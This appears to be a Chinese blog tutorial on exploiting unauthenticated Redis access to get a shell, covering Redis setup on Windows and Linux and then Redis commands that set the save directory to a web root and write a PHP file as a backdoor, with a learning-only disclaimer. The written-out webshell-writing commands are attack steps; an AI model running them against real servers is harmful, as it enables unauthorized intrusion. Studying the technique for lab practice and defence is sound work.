数据库服务类--Redis--未授权访问&终端Getshell

免责声明:本文仅做技术交流与学习.

目录

前提条件:

windows上开启redis服务:

Linux上创建&开启redis服务:

操作:

1-连接靶机redis

2-写入webshell

3-访问后门


redis--->webshell

Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)

前提条件:

端口开放(6379)

目录结构清晰

windows上开启redis服务:

sql 复制代码
windows:
redis-server.exe redis.windows.conf
redis-cli.exe -h 127.0.0.1 -p 6379

Linux上创建&开启redis服务:

复制代码
复制代码
1、下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
​
2、解压编译
tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译
​
3、配置及启动
cd src/ #进入src目录 
cp redis-server /usr/bin/ 
cp redis-cli /usr/bin/      #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd ..   # 返回上一级目录
cp redis.conf /etc/     #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf  # 使用/etc/目录下的redis.conf文件中的配置启动redis服务

操作:

1-连接靶机redis

2-写入webshell

sql 复制代码
config set dir /www/wwwroot/IP
config  set dbfilename test.php
set test "<?phpphpinfo();?>"
bgsave
save

目录,文件名自己改

写入内容自己改...

3-访问后门路径

--上线...


相关推荐
寻觅神话061 小时前
Android 应用常见安全问题
安全·android安全·owasp masvs
车载测试工程师1 小时前
汽车功能安全-嵌入式软件测试(软件合格性测试)【目的、验证输入、集成&验证要求】11
功能测试·网络协议·测试工具·安全·车载系统·汽车·测试覆盖率
九皇叔叔1 小时前
【9】PostgreSQL 之 vacuum 死元组清理
数据库·postgresql
DKPT1 小时前
Java设计模式之行为型模式(责任链模式)介绍与说明
java·笔记·学习·观察者模式·设计模式
风雅的远行者1 小时前
mysql互为主从失效,重新同步
数据库·mysql
崔高杰1 小时前
微调性能赶不上提示工程怎么办?Can Gradient Descent Simulate Prompting?——论文阅读笔记
论文阅读·人工智能·笔记·语言模型
晨岳1 小时前
CentOS 安装 JDK+ NGINX+ Tomcat + Redis + MySQL搭建项目环境
java·redis·mysql·nginx·centos·tomcat
执笔诉情殇〆1 小时前
前后端分离(java) 和 Nginx在服务器上的完整部署方案(redis、minio)
java·服务器·redis·nginx·minio
KhalilRuan2 小时前
Unity Demo——3D平台跳跃游戏笔记
笔记·游戏·unity·游戏引擎
宇钶宇夕2 小时前
S7-1200 系列 PLC 中 SCL 语言的 PEEK 和 POKE 指令使用详解
运维·服务器·数据库·程序人生·自动化